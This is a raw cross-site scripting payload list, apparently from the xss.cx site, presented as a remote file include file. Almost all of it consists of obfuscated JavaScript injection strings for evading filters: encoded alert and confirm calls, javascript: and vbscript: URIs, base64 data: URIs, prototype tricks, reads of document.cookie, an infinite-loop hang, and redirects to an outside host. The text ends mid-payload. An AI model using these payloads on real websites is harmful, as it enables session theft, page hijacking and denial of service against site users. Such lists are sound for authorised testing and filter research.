/* Remote File Include with Javascript via XSS.Cx */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-xss-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */ /* Updated September 28, 2014 */ /* RFI START */ '() {' document.createElement('img').src='javascript:while(1){}' '<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>' (function(a){alert(1)}).call() {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} p'rompt(1) "(prompt(1))in" parseInt("prompt",36); eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41))) eval(1558153217..toString(36))(1) eval(630038579..toString(30))(1) eval(0x258da033.toString(30))(1) for((i)in(self))eval(i)(1) {"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}} //prompt.ml%2f@ᄒ.ws/✌ //prompt.ml%2f@⒕₨ javascript:prompt(1)#{"action":1} vbscript:prompt(1)#{"action":1} window.location.assign("http://xss.cx") window.name='a\x01b' window.name='hacked';location.replace('about:blank'); window.name="javascript:confirm((window.opener||window).document.cookie);"; window.open("http://xss.cx","confirm(document.domain);", "", false); vbscr ipt:confirm(1)" vbscript:confirm(1); vbscript:confirm(1); {{{}.toString.constructor('confirm(1)')()}} try{confirm(document.domain)}catch(e){location.reload()} \u003C \u003E \u003c \u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e \u003e \u0061lert(1) \u0061\u006c\u0065\u0072\u0074 \u0061\u006c\u0065\u0072\u0074(1) %ufflcxss%2f%uffle this["ownerDocu"+"ment"]["loca"+"tion"]=”//google.com” throw delete~typeof~confirm(1)/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== data:text/html, .__defineGetter__.constructor('[].constructor. defineSetter('x',confirm); x=1; delete [a=confirm],delete a(1) delete confirm(1) delete~[a=confirm]/delete a(1) var a=0; ((a == 1) ? 2 : confirm(1));// null%22%20style%3d%22background%3aexpression%28confirm%282727%29 ";document.body.addEventListener("DOMActivate",confirm(1))// delete~[a=confirm]/delete a(1) (0)['constructor']['constructor']("\141\154\145\162\164(1)")(); javascript:confirm&lpar1&rpar " onfocus="write(unescape('<')+'script src='+unescape('"http://') ' onmouseover=confirm(document.location) (0)['constructor']['constructor']("\141\154\145\162\164(1)")(); {1+1,confirm(8)} OnMouseOver ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ 12345 /\51')() 1/confirm(1) "1\"&confirm(1)\"3" >%22%27>'%uff1cscript%uff1econfirm('XSS')%uff1c/script%uff1e'">>"'';!--"=&{()} \%22}%29%29%29}catch%28e%29{confirm%28document.domain%29;}// '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Exss(0x000045)%3C/script%3E \%22;confirm(1);// \%22))}catch(e){}if(!self.a)self.a=!confirm(document.cookie)// Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm ExternalInterface.call("document.write",""); ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100'); myWindow.document.write(\"hi\");myWindow.focus()"); JaVaScRipT:confirm(1) String.fromCharCode(0xffff+0x3d) (String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41)) [U+2028]confirm(1) '-/"/-confirm(1)//' +confirm(1) +confirm(1)-- -confirm(1)- \";confirm(1);// “;confirm(1)// confirm(1)".replace(/.+/,eval)// confirm(1)>>>/xss '+confirm(9)&&null==' ';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//"; confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//-- ';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--">'> ';confirm(String.fromCharCode(88,83,83))//\';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//\";confirm(String.fromCharCode(88,83,83))//-->">'>=&{} \";confirm(document.location);// confirm(document.location) confirm(document.selection.createRange().getBookmark()) confirm(location.hostname) confirm(window.toStaticHTML('')); confirm(window.toStaticHTML('